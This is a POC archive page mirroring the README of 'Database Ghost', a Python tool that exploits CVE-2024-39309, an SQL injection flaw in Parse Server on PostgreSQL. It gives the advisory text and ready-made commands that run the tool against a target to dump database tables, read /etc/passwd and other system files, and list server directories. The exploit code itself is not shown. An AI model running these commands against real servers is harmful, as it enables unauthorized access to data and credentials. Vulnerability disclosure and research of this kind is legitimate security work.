Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-39309 PoC — ZDI-CAN-23894: Parse Server literalizeRegexPart SQL Injection Authentication Bypass Vulnerability

Source
https://github.com/HeavyGhost-le/POC_SQL_injection_in_Parse_Server_prior_6.5.7_-_7.1.0
Associated Vulnerability
Title:ZDI-CAN-23894: Parse Server literalizeRegexPart SQL Injection Authentication Bypass Vulnerability (CVE-2024-39309)
Description:Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. A vulnerability in versions prior to 6.5.7 and 7.1.0 allows SQL injection when Parse Server is configured to use the PostgreSQL database. The algorithm to detect SQL injection has been improved in versions 6.5.7 and 7.1.0. No known workarounds are available.
Description
Advanced PostgreSQL database enumeration tool exploiting CVE-2024-39309 in Parse Server - Comprehensive SQL injection exploitation for security research
Readme
Database Ghost 🔥
Advanced PostgreSQL SQL Injection Exploitation Tool
<p align="center"> <img src="https://img.shields.io/badge/Python-3.6%2B-blue?style=for-the-badge&logo=python" alt="Python"> <img src="https://img.shields.io/badge/PostgreSQL-SQL%20Injection-red?style=for-the-badge&logo=postgresql" alt="PostgreSQL"> <img src="https://img.shields.io/badge/CVE-2024--39309-orange?style=for-the-badge" alt="CVE-2024-39309"> </p>

🚨 DISCLAIMER
FOR AUTHORIZED SECURITY TESTING ONLY
Unauthorized use is illegal. Use only on systems you own or have explicit permission to test.

⚡ QUICK START
Install & Run

```
git clone https://github.com/HeavyGhost-le/POC_SQL_injection_in_Parse_Server_prior_6.5.7_-_7.1.0.git
cd POC_SQL_injection_in_Parse_Server_prior_6.5.7_-_7.1.0
pip install requests
chmod +x star_ghost_english.py
```

# Basic Usage

```bash
# Full database enumeration
python3 star_ghost_english.py -u http://target:1337 -a your-app-id

# Enumerate specific table
python3 star_ghost_english.py -u http://target:1337 -a your-app-id -t users

# Read specific file
python3 star_ghost_english.py -u http://target:1337 -a your-app-id -f /etc/passwd

# List directory contents
python3 star_ghost_english.py -u http://target:1337 -a your-app-id -d /var/www

# Read common system files
python3 star_ghost_english.py -u http://target:1337 -a your-app-id --read-system

# Enumerate specific schema
python3 star_ghost_english.py -u http://target:1337 -a your-app-id -s custom_schema
File Snapshot

 [4.0K]  /data/pocs/58d308d0f1ea5e5073fc43d45abbe45f66dea958
├── [1.4K]  README.md
└── [ 23K]  star_ghost_english.py

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →